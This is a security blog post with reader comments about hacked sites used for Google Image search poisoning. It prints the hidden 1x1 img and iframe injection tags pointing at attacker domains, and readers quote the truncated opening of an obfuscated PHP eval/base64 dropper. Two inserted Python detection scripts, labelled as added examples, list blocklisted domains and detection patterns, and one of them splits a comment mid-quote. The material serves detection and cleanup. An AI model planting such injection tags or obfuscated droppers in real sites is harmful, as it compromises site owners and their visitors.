Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.

Imgaaa .net And Other Blacklisted Domains Used in Google Image Search Poisoning

   08 May 11   Filed in Short Attack Reviews

This is a short follow up on my post about hacked sites that poisoned Google Image search results.

As I mentioned in that post, most compromised sites where hackers created malicious doorway pages contained one of the following images or iframes in their legitimate index pages.

Imgaaa .net

<img heigth="1" width="1" border="0" src="hxxp://imgaaa .net/t.php?id=6214178">

Alcobro .net

<iframe heigth="1" width="1" frameborder="0" src="hxxp://alcobro .net/t.php?id=3048415"></iframe>

Myteenmovies .net

<img heigth="1" width="1" border="0" src="hxxp://myteenmovies .net/t.php?id=5360168">

Curem .net

<iframe heigth="1" width="1" frameborder="0" src="hxxp://curem .net/t.php?id=1517731"></iframe>

Imgddd .net

<img heigth="1" width="1" border="0" src="hxxp://imgddd .net/t.php?id=16093394">

Zoomt .net

<iframe heigth="1" width="1" frameborder="0" src="hxxp://zoomt .net/t.php?id=143230"></iframe>

Numbers in URLs may vary.

The following domain names also point to the same IP address and may be used in this attack: imgbbb .net, imgccc .net, imgddd .net, ingeee .net. I haven’t seen malicious code with these domains yet though.

Since I sent my information to Google last Thursday, they did a good job of scanning and blacklisting most sites I reported to them.

Calculations

For such blacklisted sites, you’ll see one of the above-mentioned domain names in Safe Browsing diagnostic pages. This makes it possible to count blacklisted sites that were part of this black hat SEO campaign.

Imgaaa .net — 7,091 infected domains
Alcobro .net — 1,513 infected domains
myteenmovies .net — 2,347 infected domains
Curem .net — 4,075 infected domains
Zoomt .net — 243 infected domains
Imgddd.net — not blacklisted yet
——————————————————
Total — 15,269 infected domains

As you can see, I used quite a small number (5,000) of infected sites in my calculations of the problem scale in the last post.

Of course, this new number is not perfect either. On the one hand, this number can grow as Google detects more and more compromised sites (and the imgddd domain is not even blacklisted yet). On the other hand, a few webmasters told me that some blacklisted sites with “imgaaa” in diagnostic pages don’t have doorway pages for some reason — only the above-mentioned code in legitimate files. So the number of sites with the image result hijacking doorway pages should be lower than the number of blacklisted sites. To make things even more complex, one blacklisted domain may contain several malicious spam-generating scripts in different subdirectories (I saw sites with 7 such scripts in different subdirectories).

Update (May 10th, 2011): The imgddd .net domain is finally blacklisted. At this point Google is aware of 2,292 6,053 sites with injected “imgddd” code.

Update (May 11th, 2011):

Today I came across an infected site with the imgbbb malicious code

<img heigth="1" width="1" border="0" src="hxxp://imgbbb .net/t.php?id=14401539">

Google has blacklisted this domain too. At this point Google is aware of 2,681 sites with injected “imgbbb” code.

Update (May 16th, 2011):

New domain: adam-love .net

<img heigth="1" width="1" border="0" src="hxxp://adam-love. net/t.php?id=14752333">

Google currently knows about 1,059 infected sites.

The total number of known infected sites as of May 16th: 34,459

Update (May 30th, 2011):

New domain: eozljijd .co.cc -- not blacklisted yet

<img heigth="1" width="1" border="0" src="hxxp://eozljijd .co.cc/1986725.jpg">

Note how they changed /t.php?id=14752333 image links to /1986725.jpg to make them look less suspicious.
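The injected tags above share three traits a scanner can key on: a 1x1 size (written with the attacker's misspelled "heigth" attribute), a src on one of the domains listed in this post, and a path of the form /t.php?id=NNN or, in the latest variant, /NNN.jpg. The following is an added example, not code from the original post; it parses HTML with Python's html.parser and reports img/iframe tags matching those traits. The blocklist is only the domains named on this page, and the sample page and scan_index_files helper are constructed for illustration.

```python
# Added example (not from the original post): flag hidden 1x1 <img>/<iframe>
# tags of the kind injected into index pages in this campaign.
import os
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Domains named in the post, with the defanging space removed. Assumption: a
# real deployment would load a current blocklist instead of this fixed set.
KNOWN_BAD_HOSTS = {
    "imgaaa.net", "imgbbb.net", "imgccc.net", "imgddd.net", "ingeee.net",
    "alcobro.net", "myteenmovies.net", "curem.net", "zoomt.net",
    "adam-love.net", "eozljijd.co.cc",
}

# Both URL shapes seen in the campaign: /t.php?id=<digits> and /<digits>.jpg
TRACKER_PATH = re.compile(r"^/(t\.php\?id=\d+|\d+\.jpg)$")


def _is_tiny(attrs):
    # The injected tags misspell "height" as "heigth"; accept both spellings
    # so the typo cannot be used to slip past a naive height="1" check.
    a = {k.lower(): (v or "").strip() for k, v in attrs}
    return a.get("width") == "1" and ("1" in (a.get("height"), a.get("heigth")))


class HiddenTagFinder(HTMLParser):
    """Collects suspicious img/iframe tags while the page is parsed."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() not in ("img", "iframe"):
            return
        src = dict(attrs).get("src") or ""
        if not src:
            return
        u = urlparse(src)  # hxxp:// defanged URLs still split into host/path
        host = (u.hostname or "").lower()
        path = u.path + ("?" + u.query if u.query else "")
        reasons = []
        if host in KNOWN_BAD_HOSTS:
            reasons.append("blocklisted host")
        if _is_tiny(attrs):
            reasons.append("1x1 pixel")
        if TRACKER_PATH.match(path):
            reasons.append("tracker-style path")
        if not reasons:
            return
        # A lone 1x1 pixel may be a legitimate analytics beacon, so only a
        # known host or pixel+tracker-path combination is rated high.
        high = "blocklisted host" in reasons or len(reasons) >= 2
        self.findings.append({
            "tag": tag.lower(), "host": host, "src": src,
            "reasons": reasons, "line": self.getpos()[0],
            "confidence": "high" if high else "low",
        })


def scan_html(html):
    """Return the list of suspicious img/iframe findings in one HTML document."""
    finder = HiddenTagFinder()
    finder.feed(html)
    finder.close()
    return finder.findings


def scan_index_files(webroot):
    """Walk a web root and scan every index.html / index.php (the files the
    campaign appended its tag to). Returns {relative path: findings}."""
    report = {}
    for dirpath, _dirs, files in os.walk(webroot):
        for name in files:
            if name.lower() in ("index.html", "index.htm", "index.php"):
                path = os.path.join(dirpath, name)
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    found = scan_html(fh.read())
                if found:
                    report[os.path.relpath(path, webroot)] = found
    return report


# Constructed sample page: a real logo, an injected imgaaa tag, a benign
# analytics pixel on an unrelated host, and an injected .jpg-style iframe.
SAMPLE_HTML = """<html><body>
<img src="/images/logo.png" width="200" height="100">
<img heigth="1" width="1" border="0" src="http://imgaaa.net/t.php?id=6214178">
<img src="https://example.org/pixel.gif" width="1" height="1">
<iframe heigth="1" width="1" frameborder="0" src="http://eozljijd.co.cc/1986725.jpg"></iframe>
</body></html>"""

if __name__ == "__main__":
    for f in scan_html(SAMPLE_HTML):
        print(f["confidence"], f["tag"], f["host"], ", ".join(f["reasons"]), "line", f["line"])
```

Run scan_index_files against a copy of the site's document root rather than the live one, and treat a "low" finding as a prompt to look at the host, not as proof of compromise.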

To Webmasters

You can find detection and clean up instructions in my previous post or you can contact me if you need my help in resolving this issue.


Reader's Comments (8)

  1.

    Got hacked 10 days ago on several sites. One of them got blacklisted by Google (that's how it was found).

    The pattern used “imgddd.net” on the same day, on all sites.
    It infected mostly Linux servers, working exactly as you described:
    – appending the “<img …” on every “index.php” and “index.html” files
    – creating a “.log” folder with the daily generated cache keyword pages
    – creating a “##.php” or “aaa.php” file
    – creating a “.htaccess” file when one did not exist, redirecting to file above

    Now, after cleaning, I deleted all FTP passwords from FTP client (lazy..), altered all of them, and saved them on LastPass, and just finished a thorough system scan.
    Tomorrow, will scan other computers and change all FTP passwords again…

    You did a great research! Thanks.
    It seems this virus has been spreading quickly since January if you check Alexa's ranks for the domains mentioned.

    •

      Thanks for the summary.

      By the way, are those “##.php” and “aaa.php” files identical or not?

      •

        Hi Denis,

        Yes, actually, they are!
        However, this file was not created on all servers, only on a couple!

        One of them was named “aig.php” and the other “aarp.php”

        In my case, their content is:

        I’ve learned my lesson! Never storing passwords on FTP client again..
        Also never using Google Images again… lol

        I had requested the malware rescan through GWT and they removed the site from the blacklist in less than 10h.
        Phew… All looks ok for now.

        •

          The tags were trimmed by the validator.
          The content is:
          <? eval(gzuncompress(base64_decode(‘eNqVWG2P4kYM/jOVu… P/AbQiT9I=’))); ?>

    •

      Same at one of our sites, only the .htaccess wasn’t changed. And there was a file called microphones.php, file size 11445 Bytes.

      Content started with
      “<? eval(gzuncompress(base64_decode('eNqVWG2P4kYM/jOVu
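The commenters above describe the same server-side footprint on every infected host: a PHP file with a varying name (aaa.php, aig.php, microphones.php, ...) whose body is an eval(gzuncompress(base64_decode('...'))) chain, an .htaccess that routes requests into it, and a hidden ".log" cache directory for the generated keyword pages. Because the file names vary, detection has to key on content and layout rather than names. The following triage script is an added example, not code from the post or its comments; the eval-chain and .htaccess patterns are assumptions about the shape described in the thread, and build_demo_webroot constructs a throwaway directory with a placeholder payload instead of the real one.

```python
# Added example (not from the post or its comments): triage a web root for the
# three artifacts the commenters describe, keyed on content rather than names.
import os
import re
import tempfile

# eval( gzuncompress( base64_decode( '...' ))) with either quote style and any
# whitespace between the calls. Assumption: the real droppers used this order.
EVAL_CHAIN = re.compile(
    r"eval\s*\(\s*gzuncompress\s*\(\s*base64_decode\s*\(\s*['\"]", re.IGNORECASE)

# .htaccess directives that hand requests to a .php script. Assumed shapes:
# the commenter only says the file "redirects to the file above".
HTACCESS_RULE = re.compile(
    r"^\s*(RewriteRule|ErrorDocument|Redirect\w*)\b.*\.php",
    re.IGNORECASE | re.MULTILINE)

HEAD_BYTES = 64 * 1024  # the eval chain sits at the very top of the dropper


def triage_webroot(root):
    """Return sorted (indicator, relative path) tuples for the web root."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for d in dirnames:
            if d == ".log":  # hidden cache of generated keyword pages
                findings.append(("hidden_log_dir",
                                 os.path.relpath(os.path.join(dirpath, d), root)))
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    head = fh.read(HEAD_BYTES).decode("latin-1")
            except OSError:
                continue
            rel = os.path.relpath(path, root)
            if name.lower().endswith(".php") and EVAL_CHAIN.search(head):
                findings.append(("obfuscated_eval_php", rel))
            if name == ".htaccess" and HTACCESS_RULE.search(head):
                findings.append(("htaccess_routes_to_php", rel))
    return sorted(findings)


def build_demo_webroot():
    """Construct a temporary web root mimicking the described infection.
    The base64 blob is a placeholder, not the commenters' payload."""
    root = tempfile.mkdtemp(prefix="webroot_")
    files = {
        "index.html": "<html><body>clean page</body></html>\n",
        # Legitimate use of base64_decode without eval must not be flagged
        "config.php": "<?php $key = base64_decode('c2VjcmV0'); ?>\n",
        "aaa.php": "<? eval(gzuncompress(base64_decode('PLACEHOLDER_PAYLOAD'))); ?>\n",
        ".htaccess": "RewriteEngine On\nRewriteRule ^(.*)$ aaa.php [L]\n",
        # Multi-line, double-quoted variant spread across lines
        os.path.join("blog", "aarp.php"):
            "<?php\neval (\n  gzuncompress(base64_decode(\"PLACEHOLDER\")));\n",
        os.path.join(".log", "cache.txt"): "generated keyword page\n",
    }
    for rel, body in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for indicator, rel in triage_webroot(build_demo_webroot()):
        print(f"{indicator:24s} {rel}")
```

The hidden_log_dir hit alone is weak evidence (other software creates dotted directories), but the combination of all three indicators in one document root matches the pattern reported in this thread closely enough to justify pulling the host for cleanup and rotating the FTP credentials the commenter mentions.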

  2.

    Thanks for the info. My website has also been hit by malware, but it was cleaned up and reported to Google. I’m still waiting …

  3.

    The hackers need to clean up their spelling, image ‘heigth’?